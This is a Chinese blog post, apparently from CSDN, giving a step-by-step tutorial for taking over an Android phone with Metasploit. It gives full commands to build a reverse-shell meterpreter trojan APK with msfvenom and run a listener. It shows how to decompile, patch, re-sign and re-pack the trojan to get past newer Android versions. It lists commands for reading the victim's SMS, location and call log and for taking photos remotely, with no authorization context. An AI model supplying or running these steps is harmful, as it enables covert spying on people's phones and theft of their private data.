使用msf工具对安卓手机进行渗透攻击———超详细

已于 2023-07-28 14:53:53 修改
阅读量1.3w 收藏 302
点赞数 42
文章标签: android 网络安全
于 2023-07-28 02:08:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71669458/article/details/131970854
版权

前期准备

1.需要安装好kali的虚拟机

2.在Windows电脑上需要配置Java环境变量

具体实现

一.生成安卓木马

打开终端输入 ifconfig 查看本机的IP 

由于kali是运行在虚拟机上的,所以虚拟机上显示的IP并不能直接使用,需要进行端口映射的相关配置,比较麻烦,这里可以查看相关文章进行配置 ,也可以外接一张网卡直接连到kali上,这样就可以直接使用网卡的IP

以root身份运行 msfconsole打开msf

输入以下这段命令,生成安卓的apk攻击文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10(输入kali上的ip) LPORT=5555(监听端口,这里使用的是5555端口) R > /home/kali/sdf.apk(生成apk木马的名称和保存路径)

此时会在/home/kali文件下生成.apk文件

 二.配置攻击载荷

输入以下命令

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.10    //和之前生成木马的IP一样
set LPORT 5555    //和之前生成木马的端口一样
run

此刻我们就已经配置完成了

如果这时将生成的木马在安卓手机上运行时会报以下错误

 这是由于msf生成的安卓木马过于老旧,无法在新版安卓手机上运行

三.对.apk文件进行反编译

我们可以通过反编译的方法使是安卓手机能够运行我们的木马程序,废话不多说,开干!

用到的反编译工具是apktool, 可以在官方网站上下载,官方网址是:https://ibotpeaches.github.io/Apktool/

此时将我们生成的安卓木马移动的Windows上来,并且和下载好的apktool放在同一文件夹下,这样方便操作,因为apktool是一个.jar文件,需要Windows电脑上配置java的环境变量,具体如何配置,请参考相关文章,这里不在多说

在此文件夹下打开cmd,输入以下命令进行反编译

java -jar apktool_2.7.0.jar(即你的apktool的名称) d -f pdf.apk(你的apk的名称) -o ghj(存放反编译后代码的文件名称,没有会在当前目录自动生成)

 双击打开发编译后生成的文件夹,找到一个以.yml为后缀的文件

双击用记事本打开,找到这两行 

将10改成16,17改成23,保存并退出

接着,要重新打包生成未签名的包 ,输入命令

java -jar apktool_2.7.0.jar b sdf(存放反编译代码的文件名称) -o rtf.apk(打包生成apk的名称)

此时的apk文件由于还没有签名,还不能下载运行,所以要进行签名,这里使用的是java自带的标准库keytool先来生成签名证书,输入命令

keytool -genkeypair -alias sss(签名证书的别名) -keyalg RSA -validity 100 -keystore sss.jks

最后对apk文件进行签名,输入命令

jarsigner -verbose -keystore sss.jks(签名文件的名称) -signedjar hhh.apk(要生成签名包的名称) rtf.apk(未签名的包名称) sss(签名证书的别名)

将最后生成的这个木马文件发送到手机上并下载安装并运行

四.对手机进行渗透攻击

如果出现以下情况则代表已经成功渗透了安卓手机,可以开始对手机发起攻击了

 1.查看对方手机的短信

dump_sms

2.获取对方手机的GPS定位

geolocate

3.查看对方手机的通讯录

dump_calllog

4.查看对方手机安装了哪些app

app_list

5.远程控制对方手机拍摄一张照片

webcam_snap

6.查看对方手机信息

sysinfo

输入命令help,可以查看帮助文档,获取更多功能

感谢各位大佬指点

老币灯
关注
  • 42
    点赞
  • 302
    收藏
    觉得还不错? 一键收藏
  • 74
    评论
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
Kali Linux利用MSF入侵安卓手机(零基础版详细)
热门推荐
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 3313
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
黑客常用的工具之---MSF使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
07-15 957
MSF默认存放模块的目录如下。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 2595
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)
qq_33163046的博客
03-03 5011
最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣。幸运的是,metasploit里就有这个漏洞的攻击payload,于是我就开始试试了。在环境的准备中,你需要有一个kali环境。5分钟完成 Kali linux安装(基于VirtualBox)_virtualbox安装kali_晓翔仔的博客-CSDN博客倒数第二行就是我的中兴手机当然,你需要检查手机安卓的版本,已经只有该漏洞修复前的版本才有成功利用的理论可。
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 7353
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
我的MSFAndroid木马渗透的学习笔记
yuan_boss的博客
06-07 4639
使用kali制作Android木马并进行通讯录渗透的学习笔记
渗透测试神器-msf基础
qq_51796436的博客
12-01 5159
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF使用,信息搜集,模块详解,端口扫描,反弹shell
E024-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
本教程聚焦于使用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。 Armitage是一款基于图形用户界面的工具,它将Metasploit的功能进行了简化和可视化,方便测试者管理和执行渗透测试操作。...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
E023-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
在本课程中,重点介绍了如何使用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。Armitage是一个图形化的界面,使得复杂的MSF变得更加直观和易于操作。 首先,你需要启动实验环境,这包括两台...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
渗透测试中,MSF可以帮助测试者快速定位目标系统的脆弱点并进行攻击。 2. **Web传递攻击**:在这种攻击模式下,攻击者利用Web应用程序的漏洞,将恶意代码注入到页面中,当受害者访问这些页面时,恶意代码会在他们...
渗透测试工具之Metasploit Framework(MSF
weixin_50904074的博客
03-15 1788
Metasploit是当前信息安全与渗透测试领域最流行的术语,它的出现颠覆了以往的已有的渗透测试的方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些流行的系统上的操作基本上都是一样的。Metasploit 框架(Metasploit Framework ,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。
网安学习笔记 6 ---- 安卓木马软件的使用(复杂版)
ymy13326056686的博客
09-12 719
2023.9.12。
渗透测试工具MSF
2303_77223717的博客
07-08 1166
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4687
MSF是Metasploit Framework的缩写,是一款广泛使用渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。
评论 74
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值